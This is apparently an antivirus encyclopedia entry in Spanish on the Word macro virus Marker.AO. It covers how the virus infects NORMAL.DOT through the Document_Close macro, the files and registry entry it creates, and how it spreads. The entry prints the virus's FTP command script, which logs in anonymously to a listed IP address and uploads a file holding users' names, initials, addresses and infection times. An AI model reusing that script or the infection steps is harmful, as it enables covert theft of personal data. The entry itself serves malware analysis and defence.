Virus Marker.AO

Efectos:

Marker.AO produce los siguientes efectos:

• Infecta la plantilla global de Word (NORMAL.DOT file) y todos los documentos que se generen con ella. Así, todos los documentos que abra, cierre o guarde el usuario quedarán infectados.
• Abre una sesión de FTP y envía datos confidenciales del ordenador afectado, a otros ordenadores. Estos datos son los siguientes: nombre del usuario, iniciales del usuario, dirección del usuario así como la fecha y la hora en la que se produjo la infección.
• Infecta todos los documentos de Word cuando se abren.

Metodo de infección:

Marker.AO utiliza la macro DOCUMENT_CLOSE para activarse cuando se cierra un documento infectado. A partir de ese momento, Marker.AO realiza sus infecciones del siguiente modo:

Marker.AO crea los siguientes archivos:

• HFSX0000.SYS, en el directorio raíz del disco duro C:. Los caracteres 0000 representan a cuatro dígitos que Marker.AO escoge al azar. Marker.AO crea este archivo únicamente si se cumplen las siguientes condiciones:
  - Si es el primer día del mes y se cierra un documento ya infectado.
  - Si la siguiente entrada del Registro de Windows, tiene asignado el valor False:
  HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info\LogFile
  
  Marker.AO guarda en el archivo HFSX0000.SYS información sobre los usuarios infectados y el contenido de la variable LogData. Dicha variable contiene la lista de usuarios infectados, así como la fecha y la hora de las infecciones.
• NETLDX.VXD, en el directorio raíz del disco duro C:. Este archivo contiene datos que le permiten a Marker.AO ejecutar un programa de FTP (en versión o modo MS-DOS) y enviar el archivo HFSX0000.SYS a otro ordenador. Los datos que contiene NETLDX.VXD son los siguientes:
  o 209.201.88.110
  user anonymous
  pass itsme@
  cd incoming
  ascii
  put + LogFile, donde LogFile es el nombre del archivo definido anteriormente, NETLDX.VXD.
  quit

Marker.AO modifica la siguiente entrada en el Registro de Windows:

• HKEY_CURRENT_USER\ Software\ Microsoft\ MS Setup (ACME)\ User Info\ LogFile
  Marker.AO asigna el valor True a esta entrada, para recordar que ya ha creado los archivos que le permiten recoger y enviar la información confidencial del usuario (archivos HFSX0000.SYS y NETLDX.VXD).

Marker.AO lleva a cabo las siguientes acciones, que también forman parte del proceso de infección:

• Comprueba si el documento o la plantilla global de Word están infectados. Para conseguirlo busca la cadena de texto Marker dentro de cada uno de ellos. Si la encuentra, Marker.AO asume que el documento, o la plantilla, están infectados.
• Copia el código de la macro Document_Close en el interior del documento que pretende infectar.
• Añade la siguiente información, obtenida de Word y del propio ordenador, al código de la macro:
  -Nombre del usuario.
  -Iniciales del usuario.
  -Dirección del usuario.
  -Fecha y la hora en la que se infectó el documento.
  Esto quiere decir que Marker.AO utiliza el polimorfismo para llevar a cabo sus infecciones, ya que la información incluida en la macro es siempre distinta (cambia de una infección a otra).
• Marker.AO contiene una lista de los ususarios infectados, así como de las fechas de infección. Esta información se almacena en la variable LogData (dentro del código del virus).

Metodo de propagación:

Marker.AO se propaga mediante documentos de Word ya infectados que contagian automáticamente la plantilla global de Word (fichero NORMAL.DOT).

Gracias a este proceso, Marker.AO logra infectar los siguientes documentos de Word que se utilicen o se generen con dicha plantilla.

El documento infectado original llega a los ordenadores a través de distintos medios que incluyen, entre otros, disquetes, CD-ROMs, mensajes de correo electrónico con ficheros adjuntos, descargas de Internet, transferencia de ficheros a través de FTP, canales IRC, redes de intercambio de ficheros punto a punto (P2P), etc.